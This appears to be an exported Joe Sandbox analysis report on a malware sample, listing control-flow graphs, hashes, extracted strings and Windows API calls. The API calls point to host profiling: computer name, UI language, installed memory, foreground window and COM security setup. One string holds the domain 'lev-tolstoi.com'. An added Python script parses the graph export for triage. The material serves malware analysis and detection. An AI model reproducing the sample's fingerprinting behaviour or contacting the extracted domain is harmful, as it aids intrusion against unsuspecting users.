• Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 432 40a960-40a989 433 40a990-40a9e5 432->433 433->433 434 40a9e7-40aadf 433->434 435 40aae0-40ab1b 434->435 435->435 436 40ab1d-40ab39 435->436 437 40ab40-40ab69 436->437 437->437 438 40ab6b-40ab7a call 40b6a0 437->438 440 40ab7f-40ab86 438->440 441 40ae29-40ae32 440->441 442 40ab8c-40ab98 440->442 443 40aba0-40abb2 442->443 443->443 444 40abb4-40abb9 443->444 445 40abc0-40abcc 444->445 446 40abd3-40abe4 445->446 447 40abce-40abd1 445->447 448 40ae20-40ae26 call 439b60 446->448 449 40abea-40abff 446->449 447->445 447->446 448->441 451 40ac00-40ac41 449->451 451->451 453 40ac43-40ac50 451->453 454 40ac52-40ac58 453->454 455 40ac84-40ac88 453->455 458 40ac67-40ac6b 454->458 456 40ae1e 455->456 457 40ac8e-40acb6 455->457 456->448 460 40acc0-40acf4 457->460 458->456 459 40ac71-40ac78 458->459 461 40ac7a-40ac7c 459->461 462 40ac7e 459->462 460->460 463 40acf6-40acff 460->463 461->462 464 40ac60-40ac65 462->464 465 40ac80-40ac82 462->465 466 40ad01-40ad0b 463->466 467 40ad34-40ad36 463->467 464->455 464->458 465->464 469 40ad17-40ad1b 466->469 467->456 468 40ad3c-40ad52 467->468 470 40ad60-40adb2 468->470 469->456 471 40ad21-40ad28 469->471 470->470 472 40adb4-40adbe 470->472 473 40ad2a-40ad2c 471->473 474 40ad2e 471->474 475 40adc0-40adc8 472->475 476 40adf4-40adf8 472->476 473->474 477 40ad10-40ad15 474->477 478 40ad30-40ad32 474->478 479 40add7-40addb 475->479 480 40adfe-40ae1c call 40a6d0 476->480 477->467 477->469 478->477 479->456 481 40addd-40ade4 479->481 480->448 483 40ade6-40ade8 481->483 484 40adea-40adec 481->484 483->484 486 40add0-40add5 484->486 487 40adee-40adf2 484->487 486->479 488 40adfa-40adfc 486->488 487->486 488->456 488->480
                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
• API String ID: 0-490458541
• Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
• Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
• Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
• Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B

Control-flow Graph

[Graph image not reproduced. The report marks each basic block as Executed or Not Executed; this graph begins at block 40ce55-40ce62 and contains no Windows API calls, only internal calls.]
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: 3DEF27CA3EABD68D23D904AF30EFEBBC$F^$I@$N~ :$VgfW$lev-tolstoi.com$z@(
• API String ID: 0-3009054237
• Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
• Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
• Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
• Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96

Control-flow Graph

[Graph image not reproduced. The report marks each basic block as Executed or Not Executed; this graph begins at block 4087f0-4087fe and calls GetCurrentProcessId, GetCurrentThreadId, GetForegroundWindow and ExitProcess.]
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: CurrentProcess$ExitForegroundThreadWindow
• String ID: YO9W
• API String ID: 3118123366-386669604
• Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
• Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
• Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
• Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9

Control-flow Graph

[Graph image not reproduced. The report marks each basic block as Executed or Not Executed; this graph begins at block 40c36e-40c559 and contains no Windows API calls.]
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: ){+}$4cde$CJ$F'k)$GS
• API String ID: 0-4192230409
• Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
• Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
• Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
• Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96

Control-flow Graph

[Graph image not reproduced. The report marks each basic block as Executed or Not Executed; this graph begins at block 42c6d7-42c6ff and calls GetPhysicallyInstalledSystemMemory, with the remaining calls internal.]
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID: '$iJ
• API String ID: 0-30662343
• Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
• Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
• Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
• Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97

Control-flow Graph

[Graph image not reproduced. The report marks each basic block as Executed or Not Executed; this graph begins at block 42bfd3-42c0e8 and calls GetComputerNameExA at two sites, with the remaining calls internal.]
APIs
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: ComputerName
• String ID: x
• API String ID: 3545744682-2363233923
• Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
• Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
• Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
• Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797

Control-flow Graph
(The "Executed" / "Not Executed" distinction is a block colouring in the rendered graph and is not reproduced in this text export. The blocks listed below span 00426170-004264F8; the function calls into 0043B480 (twice), 00439B40, 00439B60, 00407FF0 (twice), 00408000 (twice), 00408E90 and 00408FF0.)
control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd 789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 794 426230-426283 791->794 793 4261e0-4261e7 792->793 795 4261f0-4261f6 793->795 796 4261e9-4261ec 793->796 794->794 797 426285-426289 794->797 795->791 799 4261f8-42620c call 43b480 795->799 796->793 798 4261ee 796->798 800 426310-426312 797->800 801 42628f-4262af call 439b40 797->801 798->791 805 426211 799->805 802 4264ef-4264f8 800->802 807 4262b0-4262df 801->807 805->791 807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 812 426340-426349 809->812 813 4264e6-4264ec call 439b60 809->813 811 426300-426307 810->811 814 426317-42631d 811->814 815 426309-42630c 811->815 816 426350-426365 812->816 813->802 814->809 819 42631f-42632e call 43b480 814->819 815->811 818 42630e 815->818 816->816 820 426367-426369 816->820 818->809 825 426333 819->825 823 426370-42637d call 407ff0 820->823 824 42636b 820->824 828 426390-42639a 823->828 824->823 825->809 829 426380-42638e 828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af 830->832 834 4264dd-4264e3 call 408000 831->834 835 4263bd-4263c8 831->835 832->832 833 4263b1 832->833 833->829 834->813 836 4263ca-4263d1 835->836 837 42641b-426467 call 407ff0 call 408e90 835->837 840 4263ec-4263f0 836->840 851 426470-4264b8 837->851 843 4263f2-4263fb 840->843 844 4263e0 840->844 847 426410-426414 843->847 848 4263fd-426400 843->848 846 4263e1-4263ea 844->846 846->837 846->840 847->846 850 426416-426419 847->850 848->846 850->846 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->834
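The control-flow graph above is exported as a flat token stream rather than a drawing, which makes it awkward to triage by eye. The script below is an added example, not code from the Joe Sandbox report or from the sample: it parses that token stream (my reading of the format is that `<id> <start>[-<end>]` defines a basic block, `call <addr>` records a call from the block just defined, and `<src>-><dst>` is an edge) and derives the facts an analyst wants first: the function's address span, its entry and exit blocks, its single-block loops, and which blocks call which subroutines. The function and variable names are mine; `CFG_EXPORT` is the token stream copied from the report.

```python
"""Parse the flat control-flow-graph export Joe Sandbox prints for one function.
Token stream (whitespace separated): "<id> <start>[-<end>]" defines a basic block with a
hex address range, "call <addr>" records a call from the block defined just before it,
and "<src>-><dst>" is an edge between block ids. Added example, not part of the Joe
Sandbox report; CFG_EXPORT is the token stream copied from the report above.
"""
from collections import namedtuple
from dataclasses import dataclass, field

CFG_EXPORT = (
    "control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd "
    "789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 794 426230-426283 791->794 "
    "793 4261e0-4261e7 792->793 795 4261f0-4261f6 793->795 796 4261e9-4261ec 793->796 794->794 "
    "797 426285-426289 794->797 795->791 799 4261f8-42620c call 43b480 795->799 796->793 "
    "798 4261ee 796->798 800 426310-426312 797->800 801 42628f-4262af call 439b40 797->801 "
    "798->791 805 426211 799->805 802 4264ef-4264f8 800->802 807 4262b0-4262df 801->807 805->791 "
    "807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 "
    "812 426340-426349 809->812 813 4264e6-4264ec call 439b60 809->813 811 426300-426307 810->811 "
    "814 426317-42631d 811->814 815 426309-42630c 811->815 816 426350-426365 812->816 813->802 "
    "814->809 819 42631f-42632e call 43b480 814->819 815->811 818 42630e 815->818 816->816 "
    "820 426367-426369 816->820 818->809 825 426333 819->825 823 426370-42637d call 407ff0 "
    "820->823 824 42636b 820->824 828 426390-42639a 823->828 824->823 825->809 829 426380-42638e "
    "828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af "
    "830->832 834 4264dd-4264e3 call 408000 831->834 835 4263bd-4263c8 831->835 832->832 "
    "833 4263b1 832->833 833->829 834->813 836 4263ca-4263d1 835->836 837 42641b-426467 call 407ff0 "
    "call 408e90 835->837 840 4263ec-4263f0 836->840 851 426470-4264b8 837->851 843 4263f2-4263fb "
    "840->843 844 4263e0 840->844 847 426410-426414 843->847 848 4263fd-426400 843->848 "
    "846 4263e1-4263ea 844->846 846->837 846->840 847->846 850 426416-426419 847->850 848->846 "
    "850->846 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->834"
)


@dataclass
class Block:
    start: int
    end: int
    calls: list = field(default_factory=list)  # callee addresses, in order of appearance


Cfg = namedtuple("Cfg", "blocks edges")  # blocks: {id: Block}, edges: {(src_id, dst_id)}


def parse_cfg(text: str) -> Cfg:
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, set(), None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            edges.add((int(src), int(dst)))
            i += 1
        elif tok == "call":
            if current is None:
                raise ValueError("'call' token before any block definition")
            blocks[current].calls.append(int(tokens[i + 1], 16))
            i += 2
        else:
            # A block id is always followed by its range, so the range token is consumed
            # here even when it is a single all-digit address such as "426211".
            current = int(tok)
            lo, _, hi = tokens[i + 1].partition("-")
            start = int(lo, 16)
            blocks[current] = Block(start, int(hi, 16) if hi else start)
            i += 2
    dangling = [e for e in edges if e[0] not in blocks or e[1] not in blocks]
    if dangling:
        raise ValueError(f"edges reference undefined blocks: {dangling}")
    return Cfg(blocks, edges)


def span(cfg):  # lowest start and highest end address over all blocks
    return (min(b.start for b in cfg.blocks.values()), max(b.end for b in cfg.blocks.values()))


def entry_blocks(cfg):  # blocks with no incoming edge
    targets = {d for _, d in cfg.edges}
    return {b for b in cfg.blocks if b not in targets}


def exit_blocks(cfg):  # blocks with no outgoing edge
    sources = {s for s, _ in cfg.edges}
    return {b for b in cfg.blocks if b not in sources}


def self_loops(cfg):  # single-block loops: a block that branches back to itself
    return {s for s, d in cfg.edges if s == d}


def callees(cfg):
    return {c for b in cfg.blocks.values() for c in b.calls}


def call_sites(cfg, addr):  # ids of the blocks that call addr
    return sorted(b for b, blk in cfg.blocks.items() if addr in blk.calls)


def summarize(text: str) -> dict:
    cfg = parse_cfg(text)
    lo, hi = span(cfg)
    return {"blocks": len(cfg.blocks), "edges": len(cfg.edges), "span": f"{lo:08X}-{hi:08X}",
            "entry": sorted(entry_blocks(cfg)), "exit": sorted(exit_blocks(cfg)),
            "self_loops": sorted(self_loops(cfg)),
            "callees": {f"{c:08X}": call_sites(cfg, c) for c in sorted(callees(cfg))}}


if __name__ == "__main__":
    for key, value in summarize(CFG_EXPORT).items():
        print(f"{key}: {value}")
```

Run on the export above, the summary shows one entry block (788) and one exit block (802), six single-block loops (789, 794, 807, 816, 832, 851) and seven distinct callees. Single-block loops are where inline decode or copy loops usually sit, so they are the natural first stop when triaging an obfuscated function. Note also that 0043B480 is called from two blocks (799 and 819) and that the report's LdrInitializeThunk reference at 0043B4AE lies 0x2E bytes past that address; that is consistent with, but does not by itself prove, the callee being the routine that contains the reference.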
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                                                                                                                                                                        • API String ID: 2994545307-1799417857
                                                                                                                                                                                                                                        • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                        • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                        • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: @CDE
                                                                                                                                                                                                                                        • API String ID: 2994545307-1513065382
                                                                                                                                                                                                                                        • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                        • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: tuv
                                                                                                                                                                                                                                        • API String ID: 0-2475268160
                                                                                                                                                                                                                                        • Opcode ID: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                        • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                        • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                        • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                        • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: \U^_
                                                                                                                                                                                                                                        • API String ID: 0-352632802
                                                                                                                                                                                                                                        • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                        • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
• Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
• Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
• Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 00434C09
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: DefaultLanguageUser
• String ID: t
• API String ID: 95929093-2238339752
• Opcode ID: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
• Instruction ID: 08a8b9a0e37a212ebea7de5d04b95149eac63241ee44ff142c93878423301f38
• Opcode Fuzzy Hash: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
• Instruction Fuzzy Hash: 53F0FF34808298CFDB10DF68D4943EEBBF16F66304F1880ACC08497382D37A9A84CB12
APIs
• GetForegroundWindow.USER32 ref: 0043B720
• GetForegroundWindow.USER32 ref: 0043B740
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
• Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
• Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
• Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
• Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
• Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
• Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
APIs
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
• Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
• Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
• Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
APIs
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
• Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
• Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
• Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
• Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
• Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
• Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
